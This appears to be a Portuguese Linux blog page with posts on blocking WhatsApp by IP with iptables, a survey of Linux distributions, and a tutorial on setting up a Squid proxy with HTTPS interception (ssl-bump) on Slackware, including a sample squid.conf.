Linux

Linux

7 days popular

Bloqueio Seletivo Whatsapp usando Iptables

By Thiago Ferreira -
0

Olá, meu nome é Thiago Ferreira e sou um dos colaboradores do PrefiroLinux, hoje mostrarei como podemos executar um bloqueio seletivo  de whatsapp e facebook usando apenas o iptables. Muito útil em ambientes onde se usa proxy transparente e não há  a possibilidade exectuar os devidos bloqueios e liberação pelas ACL’s do squid.
Aqui faremos de uma forma simples que requer apenas o conhecimento dos ips a serem bloqueados , estes se tratando da rede interna. E os ips que serão liberados, no caso apresentado os ips de nível publico.
Aqui deixo o script de forma bem simples, comentada e bem apresentado, inclusive com a notação de que cada comando fará, como o iptables tratará as regras básicas descritas.
Esse conteúdo originalmente foi incluído em minhas rotinas de bloqueio por volta de junho de 2015, após pesquisas feitas principalmente no linuxquestions.org e adaptado as minhas necessidades. Então, para futuras duvidas e buscas a base de busca deve ser o linuxquestions.
Sendo que aqui no nosso fórum temos o devido espaço para quaisquer esclarecimentos, vide;
http://forum.prefirolinux.com

As linhas são auto explicativas,  os comentários devem permanecer com o “#” antes das linhas que não são parte do script afim de evitar quaisquer erro de leitura do bash.

Criem os arquivos, bloqueio_seletivo, ipsliberados e ipsinterno

$nano /usr/share/bloqueio_seletivo
e dentro dele insira o seguinte script


Na lista de ipsliberados entre com os ips disponiveis no proprio site do whatsapp: https://www.whatsapp.com/cidr.txt .
Basta adicionar a lista a um arquivos em “/usr/share” :
$nano /usr/share/ipsliberados
Como exemplo, poderiamos ter uma serie de ips nessa ordem:

31.13.58.55
31.55.44.77
178.88.14.100

Adicione os ips, e crie um novo arquivo para inserirmos os ips da rede interna:

$nano /usr/share/ipsinterno

Em ipsinterno insiram os ips da sua rede, lembrando de seguir a seguinte regra.
Ips que serão bloqueados devem conter o “#” antes, pois o cut fará a leitura levando em consideração que esses são os unicos que devem ser tratados.
#10.10.10.44
#10.10.10.24
10.10.10.8
No caso acima, somente os dois primeiros serão bloqueados de acessar os serviços dos “ipsliberados”,  o “10.10.10.8” terá total acesso ao trafego.

Caso deseje, liste apenas os ips permitidos, sem a necessidade de usar o “#” antes do ip, ficando assim:
10.10.10.55
10.10.10.22

Aqui um exemplo do script limpo e sem comentarios…

Lembrem-se, leia todo o conteúdo do post inclusive do script para melhor entendimento.
Suporte no forum do prefirolinux.
Boa diversão

 

 

Instalação Debian e derivados via PXE [ live e install network pxe debian]

By Thiago Ferreira -
0
Pxe install

 

Instalando uma distribuição Linux via PXE, totalmente OFFLINE, sem uso de internet para baixar qualquer arquivo que não seja a imagem completa(full) do sistema, nada de ficar baixando pacotes durante a instalação!!!…
Administrar grandes quantidades de computadores nem sempre é uma tarefa fácil, por exemplo, quando se tem que formatar ou atualizar um grande numero de maquinas, mas que de certa forma implique na dificuldade de ter que fazer em maquina por maquina.
Esta solução foi testada amplamente em varias versões de S.O derivados do Ubuntu, como Xubuntu, Kubuntu, Ubuntu Server e o próprio Ubuntu .

Continue

Escolha de uma Distro Linux!

By AndersonUser777 -
1

BoasUsers!

 

hoje vou mostrar algumas Distros.

 

 

Arch Bang
ArchBang é uma distribuição GNU/Linux simples que fornece a você um leve sistema Arch Linux combinado com o gerenciador de janelas Openbox. Adequado tanto para desktop e sistemas portáteis – É rápido, estável e sempre atualizado.

Você pode personalizar a instalação para atender às suas necessidades e aproveitar os vastos recursos e conhecimentos da comunidade Arch Linux.

A página de download tem links para ambos os 32 e 64 bits, de arranque como um live CD/USB – permitindo que você facilmente testá-lo antes de fazer uma instalação completa.

Experimente-o agora, temos certeza que você vai se surpreender com o que ArchBang tem para oferecer!

Download: http://sourceforge.net/projects/archbang/files/

Arch Linux
Arch Linux é uma distribuição fundada por Judd Vinet e é otimizada para processadores i686 (Pentium Pro, II etc e AMD compatíveis). Judd inspirou-se em uma distribuição chamada CRUX.

Arch é uma distribuição rolling release, ou seja, o sistema é atualizado continuamente. Você obterá acesso às novas versões simplesmente mantendo o sistema atualizado através do gerenciador de pacotes. Utiliza o Pacman (Package manager – gerenciador de pacotes) que torna fácil a tarefa dos usuários personalizarem o sistema.

 

O número de fiéis usuários tem crescido devido as suas inúmeras qualidades e sua filosofia de desenvolvimento.

Download: https://www.archlinux.org/download/

BackBox
Backbox é uma distribuição baseada no Ubuntu, desenvolvido para executar testes de penetração e realizar avaliações de segurança. Projetado para ser rápido, fácil de usar e fornecer um ambiente desktop completo graças ao seu repositório de software próprio, sempre atualizado para as últimas versões estáveis das mais conhecidas e utilizadas ferramentas de “hacking ético”.

Pode ser iniciada diretamente pelo CD.

Download: http://www.backbox.org/downloads

 

 

[ x ]
 

Backtrack
Backtrack, distribuição com foco em testes de seguranças e testes de penetração (pen tests), muito apreciada por hackers e analistas de segurança, podendo ser iniciado diretamente pelo CD (sem necessidade de instalar em disco), mídia removível (pendrive), máquinas virtuais ou direto no disco rígido.

Download: http://www.backtrack-linux.org/downloads/

CentOS
CentOS é uma distribuição de classe Enterprise derivada de códigos fonte gratuitamente distribuídos pela Red Hat Enterprise Linux e mantida pelo CentOS Project.

CentOS proporciona um grande acesso aos softwares padrão da indústria, incluindo total compatibilidade com os pacotes de softwares preparados especificamente para os sistemas da RHEL. Isso lhe dá o mesmo nível de segurança e suporte, através de updates, que outras soluções Enterprise, porém sem custo.

Download: http://www.centosbr.org/downloads

Coyote Linux
Coyote Linux é uma pequena distribuição desenvolvida pela Vortech Consulting contendo apenas os serviços necessários para transformar um computador em um roteador de rede ou firewall.

Download: http://coyotelinux.com/downloads/

Debian
Debian é uma das distribuições mais antigas e populares. Ela serviu de base para a criação de diversas outras distribuições populares, tais como Ubuntu e Kurumin. Como suas características de maior destaque podemos citar:

  • Sistema de empacotamento .deb;
  • Apt-get, que é um sistema de gerenciamento de pacotes instalados mais práticos dentre os existentes (se não o mais!);
  • Sua versão estável é exaustivamente testada, o que o torna ideal para servidor (segurança e estabilidade);
  • Possui um dos maiores repositórios de pacotes dentre as distros (programas pré-compilados disponíveis para se instalar).

Download: http://www.br.debian.org/CD/http-ftp/

Fedora
Fedora é uma das mais populares e estáveis distribuições que existem atualmente. Ele era, no começo, um fork para a comunidade, liberado e mantido pela gigante Red Hat que, na época, estava fechando seu sistema e concentrando-se no mercado corporativo. Isso significa que, desde o princípio, o Fedora já contava com o que há de mais moderno em tecnologia de software, assim como também contava com uma das mais competentes e dedicadas equipes em seu desenvolvimento. Se o que você procura é uma distribuição com poderes de ser um servidor estável, mas com as facilidades das ferramentas de configuração gráficas, ou se, simplesmente, deseja um desktop mais robusto, o Fedora será a sua melhor escolha.

Download: http://fedoraproject.org/get-fedora

FreeBSD
O FreeBSD é um sistema operacional livre do tipo Unix descendente do BSD desenvolvido pela Universidade de Berkeley.

Está disponível para as plataformas Intel x86, DEC Alpha, Sparc, PowerPC e PC98 assim como para as arquiteturas baseadas em processadores de 64bits IA-64 e AMD64.

Considerado como robusto e estável, geralmente é utilizado em servidores, como de Internet ou Proxies, mas também pode ser utilizado como estação de trabalho.

Download: http://www.freebsd.org/where.html

Gentoo
Gentoo é uma metadistribuição baseada no sistema gerenciador de pacotes portage. A nomenclatura usada no desenvolvimento do sistema e seus produtos é inspirada na espécie de pinguim Gentoo. O gerenciamento de pacotes no Gentoo é desenhado para ser modular, portátil, fácil de manter, flexível e otimizado para a máquina usuária. Diferentemente da maioria das distribuições de software, normalmente os pacotes são compilados a partir do código fonte, mantendo a tradição dos ports (em inglês) nos sistemas BSD, embora por conveniência, alguns pacotes grandes são disponibilizados também como binários pré-compilados para várias arquiteturas.

O Gentoo descreve-se como uma metadistribuição, “devido a sua adaptabilidade quase ilimitada”.

Download: http://www.gentoo.org/main/en/where.xml

LinuxMint
Linux Mint é uma distribuição baseada no Ubuntu, com o qual é totalmente compatível e partilha os mesmos repositórios. Diferencia-se do Ubuntu por incluir drivers e codecs proprietários por padrão e por alguns recursos que permitem fazer em modo gráfico configurações que no Ubuntu são feitas de modo texto.

Utiliza por padrão o desktop Gnome modificado, com um menu no painel inferior junto à barra de tarefas, similar ao menu K do KDE. O propósito da distribuição é providenciar um sistema Linux que funcione “out-of-the-box”; isto é, esteja pronto para uso assim que terminar a instalação. Dessa maneira, o único trabalho do usuário será o de personalizar a aparência, se desejar, e instalar programas extra, caso necessite.

Download: http://www.linuxmint.com/download.php

Lubuntu
Lubuntu é um projeto derivado do Ubuntu, uma distribuição do sistema operacional GNU/Linux. Seu diferencial está em seu desenvolvimento, que foca netbooks, dispositivos móveis e os micros mais antigos, com menos de 256 MB de RAM.

A interface utilizada é o LXDE, que segue os mesmos padrões gráficos do KDE, mas apesar de ser para micros mais velhos ou com pouco poder de processamento, não significa que o ambiente seja sem efeitos visuais, pelo contrario, ele possui efeitos visuais bons.

Mais informações (inglês): http://lubuntu.net/ | https://wiki.ubuntu.com/Lubuntu

Download: http://people.ubuntu.com/~gilir/

Mageia
Distribuição de origem francesa criada por ex-funcionários e colaboradores da Mandriva. Ao contrário do Mandriva, que é uma entidade comercial, o projeto Mageia é um projeto da comunidade e uma organização sem fins lucrativos cujo objetivo é desenvolver um sistema operacional livre baseado em Linux.

A distribuição vêm apresentando um crescimento acentuado de acordo com o Hit Ranking do site Distrowatch.com.

Download: http://www.mageia.org/pt-br/downloads/

Mandriva
Mandriva é uma das maiores distribuições da atualidade, nasceu da fusão entre o antigo Mandrake e a brasileira Conectiva.

A Empresa Francesa Mandriva se dedica à distribuição e suporte do sistema operacional Mandriva, tem sua sede administrativa em Paris e um centro de desenvolvimento em Curitiba no Brasil, o laboratório brasileiro recebe o nome de Mandriva Conectiva, a Mandriva também possui um escritório em San Diego nos Estados Unidos. O Mandriva conta também com um grande número de contribuidores pelo mundo, o público-alvo do Mandriva Linux engloba usuários iniciantes no mundo Linux assim como usuários com mais experiência.

Download: http://www2.mandriva.com/br/downloads/

Manjaro
Manjaro nasce na Europa com uma equipe de desenvolvedores jovens que oferece uma distribuição GNU/Linux baseada nos pacotes estáveis do Arch, tornando-o 100% compatível com essa distribuição. Embora o Manjaro não seja um Arch, segundo Philip Müller, o objetivo dele é oferecer uma alternativa simples aos usuários que gostam das características do Arch como a sua velocidade, os seus pacotes sempre atualizados, a sua leveza e o seu princípio KISS/Rolling Release.

Ademais essa distribuição apresenta um visual moderno e agradável, com um instalador simples e que usa o cada vez mais popular escritório XFCE como ambiente gráfico padrão. Todavia a equipe também oferece o Manjaro Linux com os escritórios KDE, Gnome/Cinnamon, OpenBox e outros ambientes gráficos.

Download: http://sourceforge.net/projects/manjarol…s/release/

Matriux
É uma distribuição de segurança, caracterizando-se inteiramente em ferramentas gratuitas, poderosas e open source que podem ser usadas para os mais diversos fins, como por exemplo, testes de penetração, para hackers éticos, para adminstração de sistemas e rede, para investigações forenses de crimes cybernéticos, análise de vulnerabilidades e muito mais. É uma distribuição projetada para profissionais e entusiastas em segurança, embora possa ser usado normalmente como seu sistema desktop padrão, Matriux possui essa flexibilidade.

Com Matriux você pode transformar qualquer sistema desktop em um poderoso conjunto de ferramentas de testes de penetração sem ter que instalar nenhum software em seu HD (Hard Disk). Matriux foi projetado para funcionar em um ambiente com um LiveCD/DVD ou com pendrive, podendo também ser instalado em seu disco rígido em apenas algumas etapas. Matriux também inclui um conjunto de ferramentas para forense e recuperação de dados que podem ser usadas para investigações e análises forenses e recuperação de dados.

Download: http://www.matriux.com/index.php?page=download

openSUSE
openSUSE é a versão livre do belíssimo sistema operacional Novell SuSE. Além de se comportar de forma muito estável e robusta como servidor, também é muito poderoso quando o assunto é desktop.

Seu diferencial é o famoso YaST (Yeah Another Setup Tool), um software que centraliza todo o processo de instalação, configuração e personalização do sistema Linux. Podemos dizer que esta é uma das cartas-mestre do SuSE, pois pode se comparar ao painel de controle do Windows.

Download: http://software.opensuse.org/

Sabayon
Sabayon é um Sistema GNU/Linux completo, baseado no Gentoo. É uma espécie de “Gentoo Full”, ao mesmo tempo binário, semi-binario e de compilação.

Embora possa usar Portage (comando emerge), tem um Gerenciador de Pacotes próprio, chamado Entropy (comando equo) que instala (binários) e/ou adapta (semi-binários) pacotes tipo Gentoo, usando a própria infraestrutura local do Portage.

O Sabayon é conhecido por duas características principais: grande quantidade de aplicativos e beleza ímpar.

É considerada uma das Distros mais bonitas do Mundo e também já foi uma das mais utilizadas. Parte do seu sucesso se deve ao fato de ter uma grande quantidade de aplicativos nativos, incluindo vários jogos e efeitos 3D.

Download: http://www.sabayon.org/mirrors

Slackware
Slackware, junto com Debian e Red Hat, é uma das distribuições “pai” de todas as outras. Idealizada por Patrick Volkerding, Slack – apelido adotado por sua comunidade de usuários – tem como características principais leveza, simplicidade, estabilidade e segurança.

Embora seja considerada por muitos uma distribuição difícil de se usar, voltada para usuário expert ou hacker, possui um sistema de gerenciamento de pacotes simples, assim como sua interface de instalação, que é uma das poucas que continua em modo-texto, mas nem por isso se faz complicada.

Download: http://www.slackware.com/getslack/

Ubuntu
Ubuntu é uma das distribuições mais populares da atualidade e isso se deve ao fato dela se preocupar muito com o usuário final (desktop). Originalmente baseada no Debian, diferencia-se além do foco no desktop, em sua forma de publicação de novas versões, que são lançadas semestralmente.

Download: http://www.ubuntu.com/download/desktop

Zenwalk
Zenwalk (antigo MiniSlack) é uma distribuição para computadores antigos fundada por Jean-Philippe Guillemin. É baseada no Slackware, mas cada vez mais se vem distinguindo dele, mas mantendo a compatibilidade com o mesmo. O ZenWalk necessita de apenas 128 MB de memória RAM e de um processador Intel Pentium III. Pode também ser rodado diretamente do CD. É uma excelente opção para quem tem computadores ou notebooks antigos.

Há quatro versões disponíveis: Standard, que é a versão “normal” para desktops e notebooks; Core, que é um ponto de partida para construir um sistema personalizado; Live, que pode ser rodada no CD e Server, que é optimizada para servidores.

Download: http://www.zenwalk.org/

Kurumin
O Kurumin foi uma distribuição desenvolvida pela equipe do Guia do Hardware e colaboradores, com o objetivo de ser um sistema fácil de usar, voltado especialmente para iniciantes e ex-usuários do Windows. Originalmente o Kurumin foi desenvolvido com base no Knoppix, passando em seguida a utilizar também componentes do Kanotix e outros projetos, além de ser baseado nos pacotes do Debian. Todos os componentes e scripts usados são abertos, o que possibilitou também o surgimento de versões modificadas do sistema.

Apesar de ter feito um grande sucesso e ter sido durante algum tempo uma das distribuições mais usadas no país, o projeto acabou falhando em atrair um grupo de desenvolvedores interessados em participar de forma ativa do desenvolvimento. Este e outros fatores (entre eles a justificada cobrança em torno de novos recursos e melhorias) acabaram fazendo com que o projeto fosse descontinuado em janeiro de 2008.

O Kurumin 7.0r3, disponível em alguns dos mirrors, é uma versão com pequenas atualizações, sincronizada em relação aos repositórios do Debian Etch. Se você já está utilizando o Kurumin 7, pode atualizar o sistema via apt-get, sem necessidade de instalar a nova versão.

Download: http://www.baixaki.com.br/site/dwnld61950.htm

Salix
Salix é uma distribuição baseada em Slackware que é simples, rápida e fácil de usar. Salix é compatível com Slackware, para que utilizadores de Slackware possam usufruir dos repositórios Salix. Como o bonsai, Salix é pequeno, leve e o produto de ínfimo cuidado.

Download: http://www.salixos.org/download.html

Satux
Sistema operacional 100% brasileiro baseado em software livre – tem como objetivo trazer inovação, praticidade, segurança e diversão, tornando sua experiência no mundo digital inigualável.

O Satux disponibiliza até quatro ambientes de trabalho para organizar melhor suas atividades, além de uma interface simples e intuitiva, sem perder a qualidade gráfica que conta com recursos 3D e aplicativos interativos.

O mundo digital oferece inúmeras ferramentas que auxiliam suas tarefas diárias como consultar saldo bancário, realizar transações, compras on-line, troca de arquivos, entre outros. Para que você possa usufruir tudo isso é preciso ter segurança, e o Satux® oferece o suporte necessário para que suas tarefas sejam executadas de forma segura.

Download: http://www.satux.org.br/

Metamorphose
O Metamorphose é um sistema operacional completo, voltado para usuários iniciantes ou avançados; Nele você encontra mais de 150 aplicativos, incluindo, jogos (emuladores, games 3D e educativos), editores (HTML, animação, vídeo e áudio) e ainda conta com uma grande gama de aplicativos voltados para areá de multimídia e escritório.

Todos esses recursos podem ser usados rodando o sistema via LIVE-CD, sem alterar nada no seu sistema instalado no HD, ideal para iniciantes em Linux. Você também tem a opção de instala-lo no HD, com um assistente de instalação muito pratico e fácil.

Download: http://metamorphoselinux.net/

BrazilFW
O BrazilFW Firewall and Router é uma mini distribuição Linux que destina a ser um firewall e roteador. Ele é o sucessor do Coyote Linux, iniciado originalmente por Joshua Jackson, e descontinuado na versão 2.24, em Agosto de 2005.

Adotado por Claudio e Marcelo – Brazil, eles continuaram o desenvolvimento sobre o nome de BrazilFW. Tanto o Coyote Linux 2.x quando o BFW 2.x tem como base o Kernel Linux 2.4x.

A versão 3.x (em fase de desenvolvimento) do BFW utiliza o Kernel 2.6x. O usuário Erythros chegou a desenvolver uma versão 3.x, mas logo depois abandonou-a.

Em Maio de 2008, o Woshman utilizando o projeto Linux From Scratch começa a escrever a versão 3.x do zero. O BFW 2.x é uma continuação do Coyote 2.x, mas já o BFW 3.x é uma mini distribuição linux totalmente nova.

Ambas as versões do BrazilFW contam com uma gama de addons (utilitários diversos compilados e com interface projetada para rodar nesta distro) que podem ser instalados no BrazilFW para os mais variados propósitos.

O BrazilFW conta com um portal e um fórum próprios, sendo o fórum divido em 3 línguas (Português BR, Espanhol e Inglês).

Maiores informações em: http://www.brazilfw.com.br

Download: http://www.brazilfw.com.br/downloads/distro/

Chakra
O Chakra foi criado no interior da Freenode, onde alguns desenvolvedores do KDEmod se reuniam para discussões sobre GNU/Linux. Em um desses encontros resolveram criar um pequeno LiveCD baseado no Arch e com o passar do tempo o Chakra tomou uma outra direção tornando uma distribuição fácil de instalar e usar. Seguindo a filosofia KISS, o Chakra é super flexível na sua usabilidade, que tenta manter as coisas o mais simples possível.

É uma distribuição do sistema operacional GNU/Linux, desenvolvida para ser usada em desktops ou portáteis com arquitetura de 64bits (x86_64). O seu foco principal é no ambiente gráfico KDE e nos aplicativos desenvolvidos em Qt para manter seu sistema limpo de aplicações GTK. O Chakra é half-rolling, onde as releases se baseam no KDE, isto significa que a cada nova versão do KDE haverá um novo release da distribuição.

Download: http://chakraos.org/home/?get

Epidemic Linux
Distro brasileiríssima, baseada no Debian Squeeze, excelente para novatos e “cascudos”, vem sendo continuamente atualizada e já está na versão 3.2B1, lançada recentemente.

Vocês podem observar a qualidade do Epidemic pelo primor de site, que segue anexo: http://www.epidemiclinux.org/

Download: http://www.epidemiclinux.org/download/

Puppy Linux
Puppy Linux é uma distribuição Live CD iniciada por by Barry Kauler. Puppy é muito pequeno, e desenvolvido para ser seguro, fácil de usar e completamente customizável. Todo o sistema operacional e todos os outros aplicativos rodam da memória RAM.

Há algumas aplicações inclusas tais como SeaMonkey/Mozilla, AbiWord, Sodipodi, Gnumeric, e Gxine/Xine. Há ainda a possibilidade de ser adicionar aplicações, com a ferramenta Setup, adicionar e remover. A distribuição foi desenvolvida do zero, não é baseada em nenhuma outra distribuição.

Download: http://www.puppylinux.com/download/index.html

Damn Small Linux
Sistema operacional livre, Damn Small é uma mini-distribuição. Designada para executar aplicativos gráficos em computadores antigos, esta distribuição é muito pequena, possuindo apenas 50 MB de arquivos de instalação.

Damn Small Linux foi originalmente desenvolvido como um experimento para verificação de quantos sistemas funcionais preenchiam um live CD de somente 50 MB. Porém, com o tempo esta distribuição cresceu e se tornou um projeto concreto, com centenas de horas de desenvolvimento.

Pequeno, porém completo!

Com uma área de trabalho completa, esta distribuição possui aplicativos escolhidos com o melhor equilíbrio entre funcionalidade, tamanho e velocidade. Entre os principais aplicativos estão o tocador de músicas XMMS, o Firefox, o Xpdf, os editores Vim e Nano, o mensageiro Naim, o processador de texto Ted, clientes FTP e DHCP, entre outros.

Download: http://www.baixaki.com.br/linux/download…-linux.htm

SliTaz
O SliTaz é um sistema operacional livre, leve, rápido e estável que funciona completamente carregado na memória RAM e inicia a partir de mídias removíveis como um cdrom ou um pendrive. É distribuído na forma de LiveCD, o que significa que se pode obter uma imagem ISO a partir do site e gravá-la em um cdrom do qual você pode iniciar o sistema. Quando este estiver funcionando, pode-se ejetar o LiveCD e usar o drive de cd para outras tarefas. O Sistema Live fornece uma distribuição gráfica completamente funcional e permite a você manter seus dados e configurações pessoais em mídias graváveis. O sistema pode ser expandido com o gerenciador de pacotes Tazpkg e atualizações de segurança são fornecidas para as versões stable (estável) e cooking (testes).

A imagem ISO padrão da distribuição fornece 4 variantes: base, just-x, gkt-only e desktop completo e também oferece a opção de boot via web. Assim, cobre várias necessidades específicas, suportando vários dispositivos, desde computadores antigos, servidores de alta disponibilidade e plataforma ARM com o Raspberry Pi.

O SliTaz é simples de ser utilizado por usuários iniciantes em GNU/Linux: fornece uma área de trabalho moderna, que segue os padrões Freedesktop com ferramentas personalizadas que permitem ao usuário configurar todo o sistema por meio de caixas de diálogo gráficas. O sistema também permite seu gerenciamento remoto por meio de um painel de configuração via web.

O sistema base traz um servidor X simples, sem outros programas, que permite a personalização do sistema somente com os elementos que o usuário deseja. Esse sistema pode, depois, ser utilizado a partir de um CDROM, pendrive, sdcard, instalado no disco rígido ou inicializado via web.

A distribuição segue a filosofia UNIX: todos os elementos do sistema se encontram em arquivos texto. O gerenciador de pacotes e todas as configurações do sistema são arquivados em arquivos de texto simples, que podem ser lidos e modificados por qualquer pessoa. A maioria das ferramentas do sistema são feitas em SHell Script, o que permite sua customização por desenvolvedores que conheçam essa linguagem.

O boot do sistema é feito por meio de 4 scripts, que configuram todo o processo, lidam com as opções de boot, gerenciam a rede e outros comandos locais. Somente o necessário para a distribuição funcionar é executado, dando espaço para o usuário controlar todo o resto conforme suas necessidades.

O sistema é capaz de rodar completamente na memória RAM, à partir de um LiveCD, de um pendrive ou de uma instalação frugal no disco rígido. Isto permite salvar configurações e documentos em uma partição montada localmente enquanto o sistema é executado de forma rápida e responsiva.

A rede em volta da distribuição é estruturada e integrada, o que permite uma fácil navegação por todos os sites. O desenvolvimento é centralizado em repositórios Mercurial e ferramentas customizadas tais como o sistema de informação de bugs e o cookutils.

Algumas características do SliTaz:

  • Sistema de Arquivos Root com cerca de 100 MB e a imagem ISO menor que 30 MB.
  • Servidor Web pronto para uso fornecido pelo LightTPD com suporte a CGI e PHP.
  • Navegue na Web com o Midori ou o Retawq em modo texto.
  • Suporte a som fornecido pelo mixer Alsa, tocador de audio e extrator/codificador de CD.
  • Clientes de chat, e-mail e FTP.
  • Cliente/Servidor SSH fornecido pelo Dropbear.
  • Banco de Dados com o SQLite.
  • Geração de dispositivo LiveUSB.
  • Ferramentas para criar, editar ou gravar imagens de CD ou DVD.
  • Desktop elegante com o Openbox rodando sobre o Xorg (Servidor Gráfico).
  • Caixas de Diálogo gráficas nativas para utilitários de linha-de-comando.
  • Cerca de 3345 pacotes facilmente instaláveis a partir do mirror.
  • Comunidade ativa e amigável.

Download: http://www.slitaz.org/pt/get/

Kali Linux
Kali Linux é a nova geração da distribuição líder na indústria de testes des intrusão e auditoria de segurança, BackTrack. Kali Linux é uma reconstrução completa a partir do zero, aderindo completamente aos padrões de desenvolvimento Debian.

Download: http://br.docs.kali.org/download-pt-br/f…is-do-kali

Bodhi Linux
Bodhi Linux é uma distribuição destinada para computadores com poucos recursos de hardware. O estilo do sistema Bodhi prevê poucos programas instalados, somente os extremamente necessários. Isto acaba exigindo poucos recursos computacionais e faz com que se torne realmente útil para PC’s mais antigos.

O mínimo exigido para rodar o Bodhi Linux é apenas: 300+MHz CPU, 128MB RAM e 2.5GB de disco! Baseada no Ubuntu

Download: http://www.bodhilinux.com/download/

Funtoo Linux
Funtoo é um Sistema Operacional livre, baseado em Linux, baseado no Gentoo e iniciado em torno de 2008 por Daniel Robbins, membro criador e líder de projeto do Gentoo.

O Funtoo tem uma série de mudanças em pacotes considerados base, como por exemplo suporte nativo a UTF-8, e já habilitado por padrão.

Funtoo utiliza o git para guardar a árvore do Portage. Este método é descrito como superior ao utilizado pelo Gentoo através do rsync.

Metro é uma solução de empacotamento automatizada, para a criação dos stages usados durante a instalação do Funtoo. boot-update provê um mecanismo unificado de configuração dos bootloaders GRUB 1.9x(sys-boot/grub) e GRUB 0.97 (sys-boot/grub-legacy).

O Funtoo adicionou uma solução simplificada de redes em suas fundações, permitindo usuários criar de forma fácil interfaces de rede complexas baseadas em perfis preestabelecidos.

Download: http://www.funtoo.org/Subarches

DuZeru
Uma distribuição brasileira. Boas ideias surgem de nossas próprias necessidades ou a partir de problemas que tentamos solucionar, assim surgiu o DuZeru, para solucionar de maneira fácil questões de sustentabilidade, adaptação e melhor desempenho em desktops e notebooks.

Une o melhor entre sistemas operacionais e interfaces gráficas do mundo Linux, atendendo às necessidades do usuário casual, eventual, profissional ou estudante. A moeda de troca deste projeto voluntário é conhecimento mútuo, quando fazemos algo com amor e dedicação em primeiro lugar, fica bem feito.

Download: http://duzeru.org/

 

 

[ x ]
 

SQUID PROXY COM INTERCEPTAÇÃO HTTPS

By Thiago Ferreira -
0
Squid_logo

Boa pessoal, estamos sumidos, na verdade eu ando muito desanimado com qualquer coisa e há tempos desejava criar novos tutoriais e videos, porém, os problemas de saúde e outros acabam por deixar o nosso tempo pouco. Não bastasse, o desgaste é bem desanimador.
Mas sem continuar falando de coisa triste, vamos ao que interessa: Squid proxy interceptando trafego https.

É  uma solução para o controle em ambientes onde existe a real necessidade de controlar acesso, filtrar buscas por palavras e até mesmo impor restrições de segurança. Claro, o proxy por si só não irá proteger sua rede, até porque em grande parte, os problemas são causados quando existe fragilidade no elo mais fraco, o usuario! Contudo, filtrar sites com conteúdo adulto, pirataria, redes sociais já pode desafogar um pouco do consumo de banda, além claro de possibilitar a analise de sites mais visitados, possibilitar algum cache e bloquear o tik tok(brincadeira – o nft seria mais indicado).
Bom, sem mais, vamos ao que interessa…

Para este tutorial eu usei o slackware 15 por rodar bem no hardware qual tenho hoje como gateway, uma c847 com duas portas ethernet de 1Gbps. Portanto, para outras distribuições esse processo poder ter variação de local de arquivos ou binarios(Exceto o diretorio do squid). O diretorio do squid se localiza nas distribuições linux mais conhecidas em “/etc” .

No nosso caso, o primeiro passo é instalar o pacote do squid, e caso você não o tenha instalado, então sugiro que o faça via sbopkg.
Para instalar o sbopkg você pode consultar mais informações em https://sbopkg.org .
Mas para facilitar sua vida, abra um terminal e como root ou usando sudo faça:

cd /tmp && wget https://github.com/sbopkg/sbopkg/releases/download/0.38.2/sbopkg-0.38.2.tar.gz

Após o download, faça um dos dois procedimentos, o primeiro instala e o segundo é update:

installpkg sbopkg-version-noarch-1_wsr.tgz

ou

upgradepkg sbopkg-version-noarch-1_wsr.tgz

Depois, rode o sbopk, entre na opção sync e aguarde…
Logo após, vá em search, digite squid e escolha a opção string.
Selecione o squid, selecione OK e pressione a tecla “P” ou vá até ‘process’ e de enter.
Ele vai processar a fila, baixar, compilar e instalar o pacote.

Essa é a etapa mais demorada, na minha humilde plaquinha foram quase uma hora(dual core de 1.1ghz).

Após todo processo, vá para o diretorio do squi que fica localizado em /etc;

cd /etc/squid

Faça um backup do squid.conf

cp squid.conf squid.conf.o

Crie o diretorio de politicas ou como desejar dentro do diretorio do squid, esse diretorio armazenará os arquivos com as politicas de ‘acl’, portanto, é interessante que ele fique neste diretorio até por questões de organização.

mkdir -p /etc/squid/politicas

Crie o diretorio para gerarmos nossos arquivos de certificados:
mkdir -p /etc/squid/certs

Use o seu editor de texto preferido e faça as alterações que considerar necessarias(o objetivo aqui é abordar a geração de certificados e do banco de dados ssl).
Um squid.conf que talvez possa ajudar:

acl localnet src 10.0.0.0/8 # RFC1918
acl localnet src 172.16.0.0/12 # RFC1918
acl localnet src 192.168.0.0/16 # RFC1918
acl SSL_ports port 443
acl Safe_ports port 80 # http
acl Safe_ports port 21 # ftp
acl Safe_ports port 443 # https
acl Safe_ports port 70 # gopher
acl Safe_ports port 210 # wais
acl Safe_ports port 280 # http-mgmt
acl Safe_ports port 488 # gss-http
acl Safe_ports port 591 # filemaker
acl Safe_ports port 777 # multiling http
acl allowed dstdomain .whatsapp.com:5222 .whatsapp.com:443
http_access allow allowed
acl blockkeyword url_regex -i "/etc/squid/politicas/palavras-bloqueadas.acl"
acl localnetsites dstdomain "/etc/squid/politicas/dominios-liberados.acl"
acl blockeddomain dstdomain "/etc/squid/politicas/dominios-bloqueados.acl"
acl bypass_caching dstdomain "/etc/squid/politicas/sites_fora_proxy.acl"
cache deny bypass_caching
http_access deny blockeddomain
acl myports port "/etc/squid/politicas/portas.liberadas.acl"
acl myaddrs dst "/etc/squid/politicas/ips.liberados.acl"
http_access allow myports myaddrs
acl CONNECT method CONNECT
http_access allow manager
http_access deny !Safe_ports
http_access deny CONNECT !SSL_ports
http_access deny blockkeyword
http_access allow localhost
http_access allow localnet
http_access allow localhost
http_access deny all
http_port 3128 ssl-bump \
cert=/etc/squid/certs/squid-ca-cert-key.pem \
generate-host-certificates=on dynamic_cert_mem_cache_size=16MB
https_port 3129 intercept ssl-bump \
cert=/etc/squid/certs/squid-ca-cert-key.pem \
generate-host-certificates=on dynamic_cert_mem_cache_size=16MB
sslcrtd_program /usr/libexec/security_file_certgen -s /var/lib/ssl_db -M 16MB
acl splice_it ssl::server_name "/etc/squid/politicas/fora-proxy-cache.acl"
acl splice_local ssl::server_name "/etc/squid/politicas/dominios-locais-fora-proxy.acl"
acl step1 at_step SslBump1
ssl_bump peek step1
ssl_bump splice splice_it
ssl_bump splice splice_local
ssl_bump bump all
visible_hostname NOME_DA_MAQUINA
coredump_dir /var/spool/squid
refresh_pattern ^ftp: 1440 20% 10080
refresh_pattern ^gopher: 1440 0% 1440
refresh_pattern -i (/cgi-bin/|\?) 0 0% 0
refresh_pattern . 0 20% 4320
pid_filename /var/run/squid/squid.pid
cache_effective_user nobody
cache_effective_group nobody
cache deny localnetsites

Crie seus arquivos de politicas e regras acl, lembrando de substituir a localização das acl acima pelas suas ou de criar as acls informadas no squid.conf.
